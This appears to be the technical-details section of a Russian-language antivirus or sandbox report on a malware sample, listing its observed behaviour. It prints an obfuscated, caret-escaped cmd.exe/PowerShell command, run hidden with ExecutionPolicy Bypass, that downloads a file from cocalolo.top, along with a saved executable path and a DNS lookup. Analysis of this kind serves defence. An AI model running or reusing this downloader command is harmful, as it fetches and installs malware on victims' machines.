Техническая информация
- http://cocalolo.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pow^E^rs^H^El^l^.^e^xe -exEcUT^IONpOlic^y ^B^ypAss -^Nop^r^oFIL^e -W^in^DO^wS^ty^L^e ^h^I^ddE^N (^n^e^w-ob^J^eCt S^YsTEm^.Net.^wEbCLIEN^T).^d^oWnLOADF^ILE('http://cocalolo.top/s...
- DNS ASK co###olo.top
- '<SYSTEM32>\cmd.exe' /c "pow^E^rs^H^El^l^.^e^xe -exEcUT^IONpOlic^y ^B^ypAss -^Nop^r^oFIL^e -W^in^DO^wS^ty^L^e ^h^I^ddE^N (^n^e^w-ob^J^eCt S^YsTEm^.Net.^wEbCLIEN^T).^d^oWnLOADF^ILE('http://cocalolo.top/s...' (со скрытым окном)